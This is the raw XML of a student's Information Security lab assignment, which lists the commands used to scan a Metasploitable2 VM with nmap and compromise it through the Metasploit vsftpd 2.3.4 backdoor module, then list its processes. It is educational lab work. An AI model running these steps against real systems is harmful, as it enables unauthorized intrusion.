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BAF4C" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00840180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840180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>FORMAN CHRISTIAN COLLEGE (A CHARTERED UNIVERSITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C60EFD8" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14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DE0744" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14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C96E5A" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14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5C14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5AE078F" wp14:editId="4064D64F">
            <wp:extent cx="2194560" cy="2049780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="Picture 13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lue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B6ACE" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14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5D4132" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00840180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40180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>OMP421</w:t>
      </w:r>
      <w:r w:rsidRPr="00840180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AE56A" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00840180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40180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6013F0" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00840180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40180">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Assignment-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E99E8D" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00840180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274622F" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14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t>List of Running Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7928B" w14:textId="77777777" w:rsidR="00875D3F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FEDC6CC" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRPr="00355C14" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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5C14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Momina Binte Asad 251694202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF053F4" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D19B4B" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713F7C69" w14:textId="77777777" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B2E773" w14:textId="4DAD620C" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:p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IP address of Kali Linux: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.100.155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97338A" w14:textId="6FA3858D" w:rsidR="00875D3F" w:rsidRPr="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:p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P address of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etasploitabl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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.100.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B94C520" w14:textId="5E4ACD4D" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:p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7F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commands Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A18C89" w14:textId="6161A8B0" w:rsidR="00875D3F" w:rsidRPr="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59BBC154" w14:textId="7EAC8B18" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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D3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10FEC2C" wp14:editId="07A403FC">
            <wp:extent cx="4572000" cy="5400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40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10125" w14:textId="7075B1CB" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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32B247" w14:textId="29EE3F9C" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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0B1A37" w14:textId="28F981F4" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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FB3C8B" w14:textId="62874659" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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A2B159" w14:textId="77777777" w:rsidR="00C45D44" w:rsidRPr="00237F7E" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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22C675" w14:textId="4AA41C2F" w:rsidR="00875D3F" w:rsidRPr="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00237F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7F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O 192.168.100.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA0DB2" w14:textId="7904DA70" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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75D3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A3CE10A" wp14:editId="0B6540F2">
            <wp:extent cx="5943600" cy="45262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3A24C" w14:textId="4513FD14" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0C541" w14:textId="48CC52EA" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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D3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195AFE6" wp14:editId="3178BC81">
            <wp:extent cx="5943600" cy="1504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60804" w14:textId="4E7AAE8C" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53871D94" w14:textId="075D78AD" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:p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EB39AD" w14:textId="06105780" w:rsidR="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:p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F97F13" w14:textId="77777777" w:rsidR="00C45D44" w:rsidRPr="00C45D44" w:rsidRDefault="00C45D44" w:rsidP="00C45D44">
      <w:p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FE4317" w14:textId="7FE47E12" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5773D" w14:textId="10F2387A" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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D3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76D693A" wp14:editId="448047A6">
            <wp:extent cx="5943600" cy="26206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0A7B0" w14:textId="08498200" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.100.167</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070CF38C" w14:textId="5059C3C6" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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D3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EB86BC2" wp14:editId="240AA960">
            <wp:extent cx="5782482" cy="381053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DFF13" w14:textId="48108EAF" w:rsidR="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E9C00" w14:textId="182F386F" w:rsidR="00875D3F" w:rsidRPr="00237F7E" w:rsidRDefault="00875D3F" w:rsidP="00C45D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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D3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694AA80" wp14:editId="662189B2">
            <wp:extent cx="5943600" cy="10521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72947" w14:textId="78C02731" w:rsidR="005913C2" w:rsidRPr="00875D3F" w:rsidRDefault="00875D3F" w:rsidP="00C45D44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37F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00237F7E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> au</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x (</w:t>
      </w:r>
      <w:r w:rsidR="00C45D44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>given in the processes_meta2.doc file)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005913C2" w:rsidRPr="00875D3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007FF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC2C3BD4"/>
    <w:lvl w:ilvl="0" w:tplc="A9BE838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xMLY0MDEwNTExtDRX0lEKTi0uzszPAykwrAUAYakqgCwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00875D3F"/>
    <w:rsid w:val="002C6C60"/>
    <w:rsid w:val="003646E8"/>
    <w:rsid w:val="005913C2"/>
    <w:rsid w:val="00875D3F"/>
    <w:rsid w:val="00C45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C7762"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E7FBAC4D-866A-41C6-A984-B8EE882BD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D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D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mina Asad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Momina Asad</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-30T01:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T01:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>